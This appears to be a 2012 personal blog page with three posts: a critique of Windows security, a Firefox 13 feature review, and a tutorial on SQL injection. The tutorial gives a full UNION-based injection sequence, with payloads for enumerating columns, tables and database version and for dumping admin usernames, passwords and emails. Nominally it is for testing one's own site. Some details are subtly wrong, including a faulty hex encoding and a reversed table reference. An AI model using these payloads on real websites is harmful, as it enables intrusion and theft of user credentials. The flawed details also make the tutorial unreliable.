Friday, 8 June 2012

Windows Operating System From A Hackers Perspective

Before getting into the ugly part of the truth let me say one thing Microsoft Windows was one of the most ground breaking innovation in the history of computer science ,they redefined the term "Computer" from a hardcore terminal or console based geeky  hard to manipulate system to more user friendly GUI based systems.But yet critics has it,Microsoft commercialize various technology so quickly without even assessing the quality of the product and  security standards . All they thought about is how to get their product into the market before another guy does it and due to this rat race between these giants,partially completed products were released  that weren't fully prepared to face the public verdict.Instead of releasing fully tested product their strategy was to release partially completed product and  patch up system when some bugs were discovered.

Bill Gates Hire Lazy Person Quote
Don't regard me as a cynic, for i think this picture here with Bill saying "I will always choose a Lazy Person to do a Difficult job..
Because,he will find an easy way to do it." is totally stupid and i bet he might have hired a lazy code auditor for his job and thanks to him Windows have 1000's of bug fixes and security patches.
Have a look at Microsoft explanation of 0day bugs .
Just another stat about Windows Vulnerability
Just think about one thing if Microsoft  officially releases such a vast number of bug fixes and vulnerability publicaly,think about the number of unreleased ones.From a hacker perspective its just a jackpot hit,for average  user its just a nightmare.
Unreleased  0day vulnerability i.e those vulnerability that haven't been discovered by the vendor are known to Trojan writers and Blackhat community and have been a widely known secret.Even cyber weapons are created using such exploits based on Windows like the STUXNET that hit Iranian nuclear facilities in early 2010.

The problem of Microsoft methodology "release do incremental patch up and update" seems like very old fashioned and lame way  as users are paying quite a reasonable amount of money for the OS itself.
Lets put it in this way most of the anti-virus companies virtually run their company in mercy of Windows 0days and new Windows virus releases...
I will be winding this up now.

Thursday, 7 June 2012

Mozilla Firefox 13 New features and Review

Whats New In Firefox 13 That You Dont Want To Miss 

    New Tab view

  • When opening a new tab page, users are now presented with their most visited pages  
User can alter the ordering by drag and drop facility.
Pushpin like feature allowing you to pin the tab.(highlighted)
X button can be used to remove the page.(highlighted)
Note:This feature is somewhat similar to Opera's Speed dial feature. 
New Feature added to Home page
  • Default home page is highly customized for faster access to Bookmarks,Downloads,History,Sync etc 
On the whole +1 for this new customization
While these are the main visual changes that we see when upgrading to FF 13.
Various other functional changes follows like:
  • SPDY protocol now enabled by default for faster browsing on supported sites.
  • Restored background tabs are not loaded by default for faster startup.
  • Smooth scrolling is now enabled by default
For more detailed information view release notes . 
Download Mozilla Firefox 13 free download fire fox from here.
Wishing you safe browsing !!

Wednesday, 6 June 2012

Hunt For SQL Injection

So what is this buzz word "SQL injection",most of the security experts use this word quite often,even media use it.SQL injection has been quite a bit star in news world when was hit by this more common and publicly known attack method.SQL injection exploitation technique has such a widespread occurrence that most of the website owners are completely aware of the scenario,but yet they fail to implement the required amount of preventive methods,that eventually leads to compromise of user data which include the credit card details and other user credential.Latest attack on SONY PlayStation and related network shows us that how common this flaw exists and even industry giants can fall prey for it if some negligence was shown by the developer.

One of the major factor that gave SQL injection such a wide publicity is that, the method itself is very simple and can be automated to a large extend by using various automated tools like HAVIJ,SQL POISON etc.And for this reason most of the novice users can do SQL injection using such a tool to get administrator credential and thereby gain illicit entry to admin panel.These rather novice user commonly know as script kiddies can wreak havoc if they have enough privilege,most of the mass defaces and website spam can be seen as a direct out come of this.

Now let me explain how to do SQL injection testing for your own website to see if you are really SQL injection proof,You don't want bad guys doing it for you right! so please follow the steps as explained bellow:

STEP 1:Got to a URL link that you suspect as an injection point.for example: index.php?id=1

insert a ' (apostrophe) between = and 1


then if you get a SQL error like "MySQL encountered an error blah blah" then you have a likely candidate for injection.

STEP 2: Now is the right time to choose ORDER BY statement to find the number of columns.So how this work:

index.php?id=1 order by 1--

("--" comments the rest of the query.)

The page would load correctly,now increase the number to 2 and so on until an SQL error is found.

index.php?id=1 order by 2--

No error

index.php?id=1 order by 3--

No error

index.php?id=1 order by 4--

SQL error

We have error so we now know that there are 3 columns next we need to find the database name.

STEP 3:We need to find the vulnerable column in the list before start injecting for this we use UNION SELECT statement.

index.php?id=1 UNION SELECT 1,2,3--

You will probably getting a number on the page like 1,2 or 3 let us assume that it is 3 so now onwards we will inject our SQL vectors at position 3.

STEP 4:Now we can find the version and type of database by using the following query

index.php?id=1 UNION SELECT 1,2,@@version--

This will give the type of backend database that you are running on like MySQL community version 5.1+ etc make sure database is 5 otherwise following steps will not work.

index.php?id=1 UNION SELECT 1,2,group_concat(database())--

Will give you the current database name let us assume "test" as our database.

STEP 5:Now let use fetch the table names

index.php?id=1 UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--

this will give you a list of tables look for something like tbl_admin,jos_user,admin etc.

STEP 6:Now to fetch columns in the table we can use the following statements

index.php?id=1 UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name="table_name_here"--

most probably you will get error due to double quote restriction evade this by converting table name into its hex value and appending it with 0x

for example admin becomes 0x61646d696e1f may be used without quotes.

Now the list of column can be used we need to filter out only the useful columns like username password email etc.

STEP 7:Now its time to get value out of the table

index.php?id=1 UNION SELECT 1,2,group_concat(username,0x3a,password,0x3a,email) from table_name.database_name--

Now wonder what 0x3a is there it's actually hex value of:

Now we will have data of the form ben: xyz12: etc.

Thats it you are done.Happy penetration testing guys.